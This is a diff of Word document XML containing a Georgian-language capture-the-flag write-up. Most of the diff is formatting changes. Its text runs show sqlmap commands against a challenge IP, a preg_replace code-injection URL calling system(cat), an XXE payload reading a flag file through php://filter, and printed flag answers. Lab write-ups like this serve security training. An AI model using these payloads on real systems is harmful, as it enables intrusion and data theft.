                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5634,6 +6615,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -5655,6 +6637,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -5675,7 +6658,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId62"/>
+                    <a:blip r:embed="rId63"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5708,6 +6691,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t xml:space="preserve">public </w:t>
       </w:r>
@@ -5796,6 +6780,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -5816,7 +6801,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId63"/>
+                    <a:blip r:embed="rId64"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5838,6 +6823,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -5866,25 +6856,22 @@
         <w:rPr>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:t>sqlmap 35.198.135.192:31</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ka-GE"/>
-        </w:rPr>
-        <w:t>342</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ka-GE"/>
-        </w:rPr>
-        <w:t>/user?id=1 -D public -T ctf{57b23475b9b02093a9eb5d7df5f07957e2b2dc724443d6b08961fbe3387 –</w:t>
-      </w:r>
-      <w:r>
+        <w:t>sqlmap 35.198.135.192:31342/user?id=1 -D public -T ctf{57b23475b9b02093a9eb5d7df5f07957e2b2dc724443d6b08961fbe3387 –</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
         <w:t>colums</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -5905,6 +6892,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -5925,7 +6913,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId64"/>
+                    <a:blip r:embed="rId65"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5978,6 +6966,7 @@
         </w:rPr>
         <w:t>10.</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -5985,6 +6974,7 @@
         </w:rPr>
         <w:t>frameble</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6018,6 +7008,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -6038,7 +7029,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId65"/>
+                    <a:blip r:embed="rId66"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6084,6 +7075,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -6104,7 +7096,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId66"/>
+                    <a:blip r:embed="rId67"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6152,6 +7144,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -6173,7 +7166,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId67"/>
+                    <a:blip r:embed="rId68"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6221,6 +7214,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -6241,7 +7235,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId68"/>
+                    <a:blip r:embed="rId69"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6267,12 +7261,14 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t>11.substitute</w:t>
       </w:r>
@@ -6282,6 +7278,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -6312,6 +7309,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -6332,7 +7330,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId69"/>
+                    <a:blip r:embed="rId70"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6373,6 +7371,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t xml:space="preserve">preg replace </w:t>
       </w:r>
@@ -6405,6 +7404,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t xml:space="preserve">URL </w:t>
       </w:r>
@@ -6449,7 +7449,7 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:hyperlink r:id="rId70" w:history="1">
+      <w:hyperlink r:id="rId71" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6497,6 +7497,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -6518,7 +7519,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId71"/>
+                    <a:blip r:embed="rId72"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6551,6 +7552,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t xml:space="preserve">Ls </w:t>
       </w:r>
@@ -6572,6 +7574,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -6592,7 +7595,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId72"/>
+                    <a:blip r:embed="rId73"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6638,7 +7641,7 @@
           <w:lang w:val="ka-GE"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId73" w:history="1">
+      <w:hyperlink r:id="rId74" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6646,16 +7649,7 @@
             <w:szCs w:val="32"/>
             <w:lang w:val="ka-GE"/>
           </w:rPr>
-          <w:t>http://34.141.39.165:32693/?vector=/Admin/e&amp;replace=system(ca</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="32"/>
-            <w:szCs w:val="32"/>
-            <w:lang w:val="ka-GE"/>
-          </w:rPr>
-          <w:t>t</w:t>
+          <w:t>http://34.141.39.165:32693/?vector=/Admin/e&amp;replace=system(cat</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -6718,6 +7712,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -6738,7 +7733,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId74"/>
+                    <a:blip r:embed="rId75"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>

--- a/Antigone.docx
+++ b/Antigone.docx
@@ -488,6 +488,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -4327,13 +4328,206 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&lt;!DOCTYPE foo [</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;!ELEMENT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>foo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ANY&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>xxe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SYSTEM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>"php://filter/convert.base64-encode/resource=/var/www/html/flag"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>]&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&lt;foo&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>xxe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&lt;/foo&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E5B0BBA" wp14:editId="45DDB137">
             <wp:extent cx="4791744" cy="1276528"/>
@@ -4521,6 +4715,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>ctf{02bd486273026362e8a6961cd3303812073c50fa759b420b1e7a11a2c3ab0130}</w:t>
       </w:r>
     </w:p>
@@ -4645,7 +4840,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">გვაქვს ველი მოცემული, მაგრამ არ ვიცით როგორ მუშაობს.მოდივცადოთ დაგავწეროთ რამდენად სწორად გადის ჩვენირექვესტი.მაგალითისთვის ავიღოთ </w:t>
       </w:r>
       <w:r>
@@ -4812,6 +5006,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>ვიცით რომ ლინუქსში ყოველთვის არსებობს ფოლდერი passwd.</w:t>
       </w:r>
     </w:p>
@@ -4916,7 +5111,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D8B7DF0" wp14:editId="5B6B39F3">
             <wp:extent cx="3229426" cy="4467849"/>
@@ -5039,6 +5233,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD9551D" wp14:editId="7CBEF4C0">
             <wp:extent cx="5943600" cy="466725"/>
@@ -5123,7 +5318,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>ბარპის გახსნის შემდეგ რომ შევდივართ ისევ ამ ფაილზე გვიგდებს ამ ფანჯარას</w:t>
       </w:r>
       <w:r>
@@ -5351,6 +5545,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:br w:type="page"/>
       </w:r>
     </w:p>
@@ -6550,6 +6745,39 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:t>გავუშვათ ბრძანება sqlmap 35.198.135.192:31</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t>342</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t>/user?id=1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
         <w:t xml:space="preserve">პროცესში ვნახულობთ რომ არის </w:t>
       </w:r>
       <w:r>
@@ -6611,6 +6839,55 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t>sqlmap 35.198.135.192:31</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t>342</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t>/user?id=1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t>-db ის დამატებით ვიღებთ შემდეგ ბაზებს</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -6621,27 +6898,12 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="ka-GE"/>
-        </w:rPr>
-        <w:t>-db ის დამატებით ვიღებთ შემდეგ ბაზებს</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="ka-GE"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E677284" wp14:editId="01A0F7F1">
             <wp:extent cx="5010849" cy="2295845"/>
@@ -6718,7 +6980,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>გავუშვათ ბრძანება sqlmap 35.198.135.192:31</w:t>
       </w:r>
       <w:r>
@@ -6882,6 +7143,7 @@
         <w:rPr>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>გამოგვიტანა მეორე ნახევარიც</w:t>
       </w:r>
       <w:r>
@@ -6956,6 +7218,15 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -6988,7 +7259,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>შესვლისას გვხვდება სარეგისტრაციო და საავტორიზაციო ველი</w:t>
       </w:r>
       <w:r>
@@ -7080,6 +7350,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2411CEA9" wp14:editId="70BCF09E">
             <wp:extent cx="5943600" cy="2813685"/>
@@ -7149,7 +7420,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61B9D4B4" wp14:editId="283403B8">
             <wp:extent cx="5943600" cy="2386330"/>
@@ -7219,6 +7489,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ECBC603" wp14:editId="7A782E30">
             <wp:extent cx="5906324" cy="3610479"/>
@@ -7296,7 +7567,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>გვაქვს მოცემული სორსი ფეიჯზე შესვლისას.</w:t>
       </w:r>
       <w:r>
@@ -7398,6 +7668,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">ვცადოთ </w:t>
       </w:r>
       <w:r>
@@ -7502,7 +7773,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CF9BBB2" wp14:editId="03A270DD">
             <wp:extent cx="4763165" cy="2676899"/>
@@ -7630,6 +7900,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>გავხსნათ ფლეგი.</w:t>
       </w:r>
     </w:p>
@@ -7707,7 +7978,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:br/>
       </w:r>
       <w:r>
